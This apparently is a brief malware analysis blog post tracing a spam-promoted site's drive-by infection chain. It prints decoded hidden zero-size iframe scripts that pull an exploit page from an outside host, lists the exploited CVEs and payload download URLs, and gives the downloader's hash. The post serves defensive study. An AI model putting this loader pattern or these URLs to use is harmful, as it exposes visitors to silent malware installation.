There is a website which is agressively advertised in spam. It contains an unsavory (well, matter of taste) video. But what's the business in it? You guessed it (I hope): http:// 2j1f . com/ installs malware.
The main page contains two encoded scripts. The second one (near to the end) looks like a traffic counter. Really. Let's see the first one (after decoding):
<script>window.status="Done"</script>
<iframe src="header_01.gif" width=0 height=0></iframe>
The file called header_01.gif is not an image but a script, and is also encoded. The decoded code is:
<script>window.status="Done"</script>
<iframe src="http:// currentsession . net /session/index.php?usermode=start&action=level3" width=0 height=0></iframe>
Okay, we now have a 45 kilobyte script full of exploits. Summary:
CVE-2008-0625 Yahoo! Music Jukebox Yahoo! MediaGrid ActiveX control vulnerability
downloads: http:// currentsession . net /session/yahoofile.php?action=download&mode=abc
CVE-2007-3147 Yahoo! Webcam image upload ActiveX control vulnerability
downloads: see above
CVE-2007-2222 Microsoft Speech API ActiveX control vulnerability
downloads: http:// currentsession . net /session/dspeechfile.php?action=download&mode=abc
CVE-2008-0660 FaceBook PhotoUploader vulnerability
downloads: http:// currentsession . net /session/facebfile.php?action=download&mode=abc
MILW0RM:5102 another FaceBook PhotoUploader vulnerability
downloads: see above
At the end there is a script encoded by xor algorithm. It's a collection of exploits and is borrowed straight from MPack's megapack1.php (~ 0.94 version). Summary:
CVE-2006-3730 WebViewFolderIcon
CVE-2006-0003 MDAC
CVE-2007-0015 Quicktime RTSP
CVE-2006-5198 Winzip
These download http:// currentsession . net /session/file.php?action=download&mode=abc
File.php, yahoofile.php, dspeechfile.php and facebfile.php currently returns the same file (md5: 712bc609da304f1d25f2fec6a5d62b94), which is
some downloader.
